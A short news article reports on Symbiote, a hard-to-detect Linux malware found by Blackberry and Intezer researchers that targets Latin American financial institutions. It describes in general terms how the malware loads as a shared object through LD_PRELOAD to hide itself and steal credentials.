New hard to detect malware attacks discovered on Linux-based systems
Earlier this week, researchers from Blackberry and Intezer released information on a hard-to-detect Linux malware targeting Latin American financial institutions. Known as Symbiote, the threat provides unauthorized users with the ability to harvest credentials or assume remote access to the target machine. Once infected, all malware is hidden and rendered undetectable.
Intezer’s Joakim Kennedy and the Blackberry Research and Intelligence Team discovered that the threat presents as a shared object library (SO) rather than a typical executable file that users must run to infect a host. Once infected, the SO is loaded into currently running processes on the target machine.
The infected computers provide threat actors with the ability to harvest credentials, leverage remote access capabilities, and execute commands with otherwise unauthorized elevated privileges. The malware is loaded before any other shared objects via the LD_PRELOAD directive, allowing it to avoid detection. Being loaded first also allows the malware to leverage other loaded library files.